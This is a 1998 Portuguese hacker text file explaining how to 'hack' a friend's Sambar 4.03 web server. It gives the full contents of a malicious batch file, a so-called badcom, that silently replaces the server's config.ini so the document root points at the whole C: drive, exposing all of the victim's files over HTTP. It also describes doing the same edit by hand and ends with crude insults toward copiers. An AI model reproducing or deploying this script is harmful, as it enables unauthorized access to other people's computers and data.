GUIA COMPLETO DE HACKEAR SAMBAR SERVERS...
DUAS MANEIRAS DE SE HACKEAR O SAMBAR SERVER.
Produzido por SeQ MaSsÎvE® 1998. 18:48 06/01/98
-----------------------------------------------
A segurança do Html Server Sambar 4.03 é muito boa, portanto, vou
explicar como Hackear seu colega, ou amigo que possua este Html Server.
Não é por Telnet, Comandos Html, Java.. muito menos por IP, hhehe
Primeira Maneira de se alterar o DOCS\
---------------------------------------
Há um arquivo no diretório \program Files\Sambar\Config\ Chamado
Config.ini, é nele que contém todas as informações durante a inicialização
do programa, onde a também a opção para deixar o \DOCS\ como
C:\.
Veja a parte onde iremos modificar o arquivo de seu amigo...
Nota-se que na primeira Maneira, vc ter que ir até o PC de seu amigo e
editar o Config.ini dele, na segunda maneira iremos explicar como fazer
o Badcom para Hackea-lo.
Exemplo do config.ini Original.
Começando pela inicialização do [http].
---------------------------------------
[http]
Act As HTTP Proxy = false
Enable Keep-Alive = true
Server Side Includes = shtml
Truncate Logs = false
Trace Requests = true
Trace Agents = false
Trace Referrers = false
Log Format = performance
Automatic Directory Lists = true
Automatic Log Rotation = false
Allow HTTP PUT = admin
Default Page = index.htm
Home Page = index.htm
Images Directory = /images/
Classes Directory = /classes/
Documents Directory = /docs/ (Aqui é a parte onde iremos alterar....)
CGI Directory = /cgi-bin/
WinCGI Directory = /cgi-win/
CGI Timeout = 120
Keep-Alive Timeout = 15
Session Indicator = /session/
Default MIME Type = text/plain
Remote Proxy =
Remote Proxy Port =
Exemplo alterado !!
-------------------
[http]
Act As HTTP Proxy = false
Enable Keep-Alive = true
Server Side Includes = shtml
Truncate Logs = false
Trace Requests = true
Trace Agents = false
Trace Referrers = false
Log Format = performance
Automatic Directory Lists = true
Automatic Log Rotation = false
Allow HTTP PUT = admin
Default Page = index.htm
Home Page = index.htm
Images Directory = /images/
Classes Directory = /classes/
Documents Directory =../../ (Parte Alterada !!!) Como o diretório é \Program Files\Sambar\Docs\ ir para \.)
CGI Directory = /cgi-bin/
WinCGI Directory = /cgi-win/
CGI Timeout = 120
Keep-Alive Timeout = 15
Session Indicator = /session/
Default MIME Type = text/plain
Remote Proxy =
Remote Proxy Port =
Se vc observar o Config.ini completo, ir notar que há outras coisas
para modificar como por exemplo o tamanho do LOG File, coloque o para
0.
Segunda maneira:
----------------
Montando um Badcom (.seq extension).
Use o SeQ MaSsÎvE's Badcom editor© para edita-lo... ;)
pegue em: http://www.terravista.pt/Meco/1840/
Muitas pessoas dizem que Badcom's não adiantam em nada, ou coisa do
tipo. Porém ele ja me serviu para muitas coisas, uma delas foi o que
irei explicar neste texto.
QUEM IMAGINAVA QUE COM UM SIMPLES BADCOM, VC IRIA ACESSAR O DRIVE C:\
DE QUEM USA O SAMBAR SERVER ???
Pegue o arquivo config.ini do Sambar server, se não tiver pegue ele
comigo.
Altere como o exemplo acima, e proceda da seguinte forma.
Escreva na frente de todas as linhas seguido da string de criar
arquivos. Veja o exemplo a seguir...
@echo
cls
echo > 1.a [common]
echo > 2.a Log Size = 0
echo > 3.a Trace Failures = true
echo > 4.a Trace Successes = false
echo > 5.a Trace Threads = false
echo > 6.a Trace Library Usage = true
echo > 7.a Resolve Host Names = false
echo > 8.a Message File = messages/common.eng
echo > 9.a Cookie Tag = RCuid
echo > 10.a Log Directory = log
echo > 11.a Public Key = Sambar Server Encryption Key
echo > 12.a Maximum Connections = 40
echo > 13.a Network Read Timeout = 300
echo > 14.a Maximum Threads = 50
echo > 15.a [server]
echo > 16.a Server Version = 4
echo > 17.a Observe Log Size = 0
echo > 18.a FTP Log Size = 10000
echo > 19.a Maximum FTP Users = 10
echo > 20.a Maximum FTP Upload = 1000000
echo > 21.a Maximum NNTP Users = 10
echo > 22.a Maximum NNTP Upload = 1000000
echo > 23.a System Administrator = admin
echo > 24.a HTTP Port = 80
echo > 25.a Maximum Connections = 40
echo > 26.a Trace FTP = true
echo > 27.a Trace NNTP = false
echo > 28.a Act As FTP Server = false
echo > 29.a Act As NNTP Server = false
echo > 30.a Act As SMTP Proxy = false
echo > 31.a Act As POP3 Proxy = false
echo > 32.a Act As IMAP4 Proxy = false
echo > 33.a FTP Port = 21
echo > 34.a NNTP Port = 119
echo > 35.a SMTP Port = 25
echo > 36.a POP3 Port = 110
echo > 37.a IMAP4 Port = 143
echo > 38.a SMTP Server = smtp.ix.netcom.com
echo > 39.a POP3 Server = smtp.ix.netcom.com
echo > 40.a IMAP4 Server = smtp.ix.netcom.com
echo > 41.a Run Watcher = false
echo > 42.a Watcher Timeout = 1500
echo > 43.a Watcher Server = server.exe
echo > 44.a [http]
echo > 45.a Act As HTTP Proxy = false
echo > 46.a Enable Keep-Alive = true
echo > 47.a Server Side Includes = shtml
echo > 48.a Truncate Logs = false
echo > 49.a Trace Requests = true
echo > 50.a Trace Agents = false
echo > 51.a Trace Referrers = false
echo > 53.a Log Format = performance
echo > 54.a Automatic Directory Lists = true
echo > 55.a Automatic Log Rotation = false
echo > 56.a Allow HTTP PUT = admin
echo > 57.a Default Page = index.htm
echo > 58.a Home Page = index.htm
echo > 59.a Images Directory = /images/
echo > 61.a Classes Directory = /classes/
echo > 62.a Documents Directory = ../../
echo > 63.a CGI Directory = /cgi-bin/
echo > 64.a WinCGI Directory = /cgi-win/
echo > 65.a CGI Timeout = 120
echo > 66.a Keep-Alive Timeout = 15
echo > 67.a Session Indicator = /session/
echo > 68.a Default MIME Type = text/plain
echo > 69.a Remote Proxy =
echo > 70.a Remote Proxy Port =
echo > 71.a [aliases]
echo > 72.a [cgi-aliases]
echo > 73.a [events]
echo > 74.a Maximum Users = 10
echo > 75.a Maximum State Attributes = 50
echo > 76.a Timeout Duration = 180
echo > 77.a Trace Events = false
echo > 78.a ODBC Datasource =
echo > 79.a ODBC User =
echo > 80.a ODBC Password =
echo > 81.a [search]
echo > 82.a Index Only = .stm .shtml .html .htm .txt
echo > 83.a Allow Wildcarding = false
echo > 84.a Index File = search
echo > 85.a Index File = docs
echo > 86.a Index Directories = *
echo > 87.a Valid Characters = abcdefghijklmnopqrstuvwxyz�_-
echo > 88.a [user-events]
echo > 89.a INIT = samples.dll:security_init
echo > 90.a INIT = samples.dll:login_init
echo > 91.a INIT = samples.dll:finance_init
echo > 92.a INIT = samples.dll:netutils_init
echo > 93.a INIT = samples.dll:sendmail_init
echo > 94.a INIT = samples.dll:general_init
echo > 95.a EXIT = samples.dll:security_exit
echo > 96.a LOGIN = samples.dll:user_login
echo > 97.a LOGOUT = samples.dll:user_logout
echo > 98.a PROFILE = samples.dll:user_profile
echo > 99.a REQUEST = samples.dll:security_request
echo > 100.a FTP = samples.dll:ftp_connect
echo > 101.a NETCONNECT = samples.dll:security_connect
echo > 102.a HTTPPROXY = samples.dll:security_filter
echo > config.ini
: a linha echo > 62.a Documents Directory = ../../ já alterada... e outras linhas se vc quizer
: alterar...
: mandando copiar todos estes arquivos para o arquivo também criado config.ini...
copy *.a config.ini
: Apagando a sujeira toda criada....
del *.a
: Renomeando o config.ini original para .seq, ;)
ren \progra~1\sambar\config\config.ini copy \progra~1\sambar\config\config.seq
: copiando o novo e alterado para o local do sambar...
copy config.ini \progra~1\sambar\config\
: NOTA-SE que o MS-DOS, não aceitará c:\program Files e sim progra~2,
: ou progra ~1 dependendo de seu sistema..
Sobre o Autor..
Meu Nome é SeQ MaSsÎvE© e este texto foi produzido por mim."TOTALMENTE"
Se vc é otário e Lammer filha da PUTA !!, retire esta merda daqui e
fale que foi vc que fez palhaço... só que não deixe eu descobrir...
Contacte-Me
UIN: 1292685
Mail: [email protected]
The Complete Badcom's Page: http://www.terravista.pt/Meco/1840/
SataniC World Hackers Corp. : http://www.geocities.com/Pentagon/7066/
.......
FIM.